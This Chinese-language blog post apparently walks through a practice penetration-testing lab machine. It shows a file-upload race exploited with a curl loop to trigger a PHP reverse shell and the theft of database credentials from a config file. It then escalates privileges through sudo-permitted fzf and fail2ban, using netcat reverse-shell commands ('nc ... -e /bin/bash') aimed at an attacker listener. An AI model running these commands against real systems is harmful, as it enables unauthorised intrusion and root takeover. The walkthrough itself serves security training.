靶机渗透日记

最新推荐文章于 2024-08-16 15:15:00 发布
最新推荐文章于 2024-08-16 15:15:00 发布
阅读量378 收藏
点赞数
文章标签: web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47709391/article/details/123689346
版权

  1. 端口

    在这里插入图片描述

  2. 访问 80 端口

    在这里插入图片描述

    文件上传功能,上传php文件

    在这里插入图片描述

  3. 目录扫描

    在这里插入图片描述

    访问 /uploads 提示 403 ,但是可以访问到上传的文件

  4. 再次上传文件

    在这里插入图片描述

    发现延迟了3s,猜测是等待了3s后对文件变更名字,可以尝试在这3s内不断访问该文件

  5. 创建脚本,并上传反弹shell

    #!/bin/bash
while true
do
        curl "http://192.168.0.139/uploads/shell.php"
done

    成功反弹

    在这里插入图片描述

  6. 在 /opt/gancio 目录下存在 config.json ,其中包含数据库的账号密码

    在这里插入图片描述

  7. 连接数据库

    在这里插入图片描述

    得到两个密码hash,爆破得到密码 genesis

    在这里插入图片描述

    用户信息

    在这里插入图片描述

  8. 切换到connor用户,执行sudo -l

    在这里插入图片描述

    把 fzf 文件下载到本地分析

    在这里插入图片描述

    访问 https://github.com/junegunn/fzf/ ,可以得知 fzf 是一个命令行模糊查找器

    在这里插入图片描述

    _fzf_comprun()函数可以执行命令

    sudo -u john /usr/bin/fzf --preview 'nc 192.168.0.128 4445 -e /bin/bash'

    在这里插入图片描述

  9. 继续执行sudo -l

    在这里插入图片描述

    **Fail2Ban **是一个入侵检测系统框架,它可以保护电脑服务器免受暴力破解攻击。

    在这里插入图片描述

    创建防火墙规则

    echo "nc 192.168.0.128 4447 -e /bin/bash" > /tmp/iptables
chmod +x iptables

    修改fail2ban的配置文件 /etc/fail2ban/action.d/iptables-common.conf

    在这里插入图片描述

    重新启动 fail2ban

    sudo -u root /usr/bin/systemctl restart fail2ban

  10. 爆破 ssh ,本地监听 4447 端口

    在这里插入图片描述

# .
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
通过fail2ban使服务器成获得额外的安全
心生于物而死于物
08-08 613
Fail2Ban 打出服务器安全的组合拳 [code="shell"]sudo apt-get update sudo apt-get install fail2ban[/code] 安装完后服务会自动启动, 该服务的fail2ban保持在它的配置文件/etc/fail2ban目录。 有一个与默认称为文件jail.conf 。 由于此文件可以通过软件包升级进行修改,因此我们...
靶机渗透日记 messages
Anonymous
02-26 368
IP 端口 访问 80 端口 两个功能点,一个是 chatbot ,一个是 Webmail 对这两部分进行目录扫描 发现在 /chatbot 目录下存在 后台登陆页面 寻找源码,关键字 Simple ChatBot Application 得到后台的默认密码,成功访问 登录到后台发现可以上传头像,上传一个 webshell ,这里上传一句话发现怎么都无法连接,并且我只能上传到 user_avatar ,上传到 bot_avatar 上会变成 jsp 后缀文件 在 /h..
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Animetronic - hackmyvm
tanbinn的博客
08-12 469
hackmyvm的Animetronic靶场
IDS 与 IPS:网络安全的两道防线
hakksjss的博客
08-16 147
然而,IDS 也存在一定的局限性。它就像是网络世界中的“哨兵”,时刻保持警惕,依据一定的安全策略,分析网络数据包、系统日志等信息,试图发现各种潜在的攻击企图、入侵行为以及异常活动。此外,IPS 的误报率也是一个需要关注的问题,如果错误地拦截了正常的流量,可能会影响业务的正常运行。如果确定为攻击行为,IPS 则根据预先设置的规则和策略,立即阻断相关的流量,防止攻击对网络造成更大的破坏。它串联在网络中,实时分析流经的网络流量,一旦发现与已知攻击模式或异常行为相符的流量,立即采取行动,防止攻击的进一步扩散。
网络协议八 网络安全相关
hunandede的博客
08-12 428
ARP欺骗的防护原理。
网络安全(黑客)自学
白帽子凯哥聊黑客
08-16 714
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
最新发布
2401_85023531的博客
08-16 1275
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
网络安全 DVWA通关指南 DVWA File Inclusion(文件包含)
YueXuan_521的博客
08-16 485
网络安全 DVWA通关指南 DVWA File Inclusion(文件包含) 但我们可以使用file伪协议读取到文件。(这个地方需要文件的绝对路径,与Low级别不同,这里的报错信息需要提交以file开头的不存在文件或路径,否则会返回统一错误页面)文件包含漏洞的产生原因是 PHP 语言在通过引入文件时,引用的文件名,用户可控,由于传入的文件名没有经过合理的校验,或者校验被绕过,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。当被包含的文件在服务器本地时,就形成的本地文件包含漏洞。
文件上传-.htaccess利用
feiwujiushiwo的博客
08-13 391
限于Apache.htaccess文件是服务器中的一个配置文件,它负责相关目录下的网页配置。笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。
靶机:DC-4
weixin_52953960的博客
08-13 282
在 /var/mail 下有一封信,发现 charles 用户的密码。teehee是个小众的linux编辑器,执行以下命令,成功提权。查看 /etc/passwd 文件。sudo -l 看一下,不知道密码。在 jim 用户下发现密码文件。查看具有 root 权限的命令。访问80端口,发现登录页面。切换为交互式shell。使用 hydra 破解。bp抓包,是命令执行。
网络安全知识渗透测试
m0_66268916的博客
08-09 838
渗透测试是一种模拟网络攻击,用于识别漏洞并制定规避防御措施的策略。笔测试还有助于评估组织的合规性、提高员工对安全协议的认识、评估事件响应计划的有效性并确保业务连续性。渗透测试的第一步是收集有关目标网络的信息,了解网络拓扑、主机信息、服务信息、用户账户等,以便制定针对性的攻击策略。成功攻破目标系统后,需要进行后渗透测试,巩固攻击成果,并获取更多信息。根据信息收集和漏洞扫描的结果,选择合适的攻击方法,对目标网络进行渗透测试。完成渗透测试后,需要对测试结果进行分析,评估内网的整体安全状况。
杂项复现-中间件
weixin_51520483的博客
08-13 206
1、需要中间件是apache,附带PHP 7.3环境2、文件命名是需要基于本地命名(如果后端重新命名则无法实现1.php.jpg)
仿冒网站横行,奥运会票务网站安全性遭质疑,SSL证书成关键
weixin_53018687的博客
08-13 447
而在电子政务、金融服务、医疗健康、在线教育等众多领域,仿冒网站同样如幽灵般潜伏,严重威胁着用户和网站双方的利益,迫使我们必须深入探索如何增强网络安全,有效预防钓鱼网站,以切实维护广大消费者的权益。除了数据加密传输之外,SSL证书还具备网站身份验证功能,会对证书申请者身份进行严格审查和验证,从而防止不法分子通过相似域名仿冒正规网站进行钓鱼攻击,有效避免出现互联网搜索页变为不知名网站、莫名弹出广告网页、输入正常网站地址跳转到其他网站等情况的发生。在当今仿冒网站泛滥的背景下,SSL证书的重要性日益凸显。
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值